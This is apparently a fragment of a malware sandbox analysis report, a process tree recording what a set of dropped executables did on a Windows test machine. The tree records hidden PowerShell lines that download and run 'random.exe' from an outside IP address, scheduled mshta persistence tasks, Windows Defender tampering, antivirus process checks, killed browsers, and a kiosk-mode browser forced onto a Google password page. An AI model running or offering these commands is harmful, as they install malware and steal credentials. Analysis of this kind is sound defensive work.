                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:8
                                                                          6⤵
                                                                            PID:6404
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5416,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:8
                                                                            6⤵
                                                                              PID:6540
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5480,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
                                                                              6⤵
                                                                                PID:5168
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5480,i,8468349530572752444,13555343251792204234,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
                                                                                6⤵
                                                                                  PID:5820
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                PID:7148
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                5⤵
                                                                                • Uses browser remote debugging
                                                                                • Enumerates system info in registry
                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:7124
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ff8237cf208,0x7ff8237cf214,0x7ff8237cf220
                                                                                  6⤵
                                                                                    PID:3652
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1708,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:3
                                                                                    6⤵
                                                                                      PID:6820
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2480,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:2
                                                                                      6⤵
                                                                                        PID:7096
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1260,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:8
                                                                                        6⤵
                                                                                          PID:7092
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                                                                          6⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:3544
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3516,i,16898390075322413019,12658769114338908753,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
                                                                                          6⤵
                                                                                          • Uses browser remote debugging
                                                                                          PID:7116
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\q1n7g" & exit
                                                                                        5⤵
                                                                                          PID:7128
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 11
                                                                                            6⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:6852
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10348030101\3e34f7cf67.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10348030101\3e34f7cf67.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:2580
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn 28luImanbgR /tr "mshta C:\Users\Admin\AppData\Local\Temp\ASkg3vwQn.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1848
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /create /tn 28luImanbgR /tr "mshta C:\Users\Admin\AppData\Local\Temp\ASkg3vwQn.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:6124
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        mshta C:\Users\Admin\AppData\Local\Temp\ASkg3vwQn.hta
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1028
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                          5⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Downloads MZ/PE file
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3464
                                                                                          • C:\Users\Admin\AppData\Local\TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE
                                                                                            "C:\Users\Admin\AppData\Local\TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE"
                                                                                            6⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:5484
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10348040121\am_no.cmd" "
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2860
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 2
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4484
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1848
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:6084
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5584
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3504
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4540
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:436
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /create /tn "T1dZMma8hHj" /tr "mshta \"C:\Temp\j4HzL6rM1.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:5664
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        mshta "C:\Temp\j4HzL6rM1.hta"
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2252
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                          5⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Downloads MZ/PE file
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5912
                                                                                          • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                            6⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:6876
                                                                                    • C:\Users\Admin\AppData\Local\Temp\10348230101\0fbec82655.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\10348230101\0fbec82655.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:1272
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                        4⤵
                                                                                          PID:4180
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5604
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10348240101\108394fe3e.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10348240101\108394fe3e.exe"
                                                                                        3⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4456
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10348250101\563e9e5edc.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10348250101\563e9e5edc.exe"
                                                                                        3⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:6428
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10348260101\c42b585dc6.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10348260101\c42b585dc6.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:6880
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /F /IM firefox.exe /T
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:7032
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /F /IM chrome.exe /T
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:7144
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /F /IM msedge.exe /T
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3572
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /F /IM opera.exe /T
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5324
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /F /IM brave.exe /T
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3472
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                          4⤵
                                                                                            PID:5860
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                              5⤵
                                                                                              • Checks processor information in registry
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:6116
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {6bc73408-e193-4a3b-a6c1-3c0b27f69587} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                6⤵
                                                                                                  PID:3080
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2512 -prefsLen 27135 -prefMapHandle 2516 -prefMapSize 270279 -ipcHandle 2524 -initialChannelId {3bfbf395-9d47-48c0-9b94-b78b6141cb9f} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                  6⤵
                                                                                                    PID:5832
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3804 -prefsLen 25164 -prefMapHandle 3808 -prefMapSize 270279 -jsInitHandle 3812 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3856 -initialChannelId {8dd79249-d9c6-476d-af52-17b29b91b403} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                    6⤵
                                                                                                    • Checks processor information in registry
                                                                                                    PID:2640
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4036 -prefsLen 27276 -prefMapHandle 4040 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {cd201225-1bc6-4656-b531-6e5fdaae333c} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                    6⤵
                                                                                                      PID:6440
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3228 -prefsLen 34775 -prefMapHandle 3232 -prefMapSize 270279 -jsInitHandle 3192 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3308 -initialChannelId {e8eaa040-37db-4059-b1dd-70a0311b42cf} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                      6⤵
                                                                                                      • Checks processor information in registry
                                                                                                      PID:5124
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4968 -prefsLen 35012 -prefMapHandle 4972 -prefMapSize 270279 -ipcHandle 4980 -initialChannelId {fd6b9507-4e58-4dc6-85af-e233bace88ca} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                      6⤵
                                                                                                      • Checks processor information in registry
                                                                                                      PID:5160
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5136 -prefsLen 32952 -prefMapHandle 5140 -prefMapSize 270279 -jsInitHandle 5144 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5152 -initialChannelId {95a6a672-ceb3-49c1-aff4-48fd18be5ca4} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                      6⤵
                                                                                                      • Checks processor information in registry
                                                                                                      PID:4440
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5268 -prefsLen 32952 -prefMapHandle 5272 -prefMapSize 270279 -jsInitHandle 5276 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5112 -initialChannelId {ef923b7f-bc5f-4e8e-8d0b-aebc35a90099} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                      6⤵
                                                                                                      • Checks processor information in registry
                                                                                                      PID:1988
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5612 -prefsLen 32952 -prefMapHandle 5616 -prefMapSize 270279 -jsInitHandle 5620 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5624 -initialChannelId {2d50d0a5-57b8-4746-b3e1-44e496054ce3} -parentPid 6116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                      6⤵
                                                                                                      • Checks processor information in registry
                                                                                                      PID:6640
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10348270101\ad8094dd16.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10348270101\ad8094dd16.exe"
                                                                                                3⤵
                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                • Modifies Windows Defender notification settings
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Windows security modification
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4460
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10348280101\49d4f8aa60.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10348280101\49d4f8aa60.exe"
                                                                                                3⤵
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4148
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10348290101\WLbfHbp.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10348290101\WLbfHbp.exe"
                                                                                                3⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Windows directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:752
                                                                                                • C:\Windows\SysWOW64\CMD.exe
                                                                                                  "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                                                                  4⤵
                                                                                                    PID:7024
                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                      tasklist
                                                                                                      5⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      PID:6812
                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                      findstr /I "opssvc wrsa"
                                                                                                      5⤵
                                                                                                        PID:3680
                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                        tasklist
                                                                                                        5⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        PID:752
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                        5⤵
                                                                                                          PID:916
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c md 267978
                                                                                                          5⤵
                                                                                                            PID:1720
                                                                                                          • C:\Windows\SysWOW64\extrac32.exe
                                                                                                            extrac32 /Y /E Spanish.vss
                                                                                                            5⤵
                                                                                                              PID:4092
                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                              findstr /V "East" Removed
                                                                                                              5⤵
                                                                                                                PID:1588
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                                                                                                                5⤵
                                                                                                                  PID:2168
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                                                                                                                  5⤵
                                                                                                                    PID:6100
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                                                                                                                    Exam.com j
                                                                                                                    5⤵
                                                                                                                      PID:3900
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 884
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        PID:11568
                                                                                                                    • C:\Windows\SysWOW64\choice.exe
                                                                                                                      choice /d y /t 5
                                                                                                                      5⤵
                                                                                                                        PID:4828
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10348300101\BIm18E9.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10348300101\BIm18E9.exe"
                                                                                                                    3⤵
                                                                                                                      PID:1548
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10348310101\7IIl2eE.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10348310101\7IIl2eE.exe"
                                                                                                                      3⤵
                                                                                                                        PID:2452
                                                                                                                        • C:\Windows\SysWOW64\CMD.exe
                                                                                                                          "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                          4⤵
                                                                                                                            PID:4432
                                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                              tasklist
                                                                                                                              5⤵
                                                                                                                              • Enumerates processes with tasklist
                                                                                                                              PID:3536
                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                              findstr /I "opssvc wrsa"
                                                                                                                              5⤵
                                                                                                                                PID:1920
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10348320101\FjbTOQC.exe
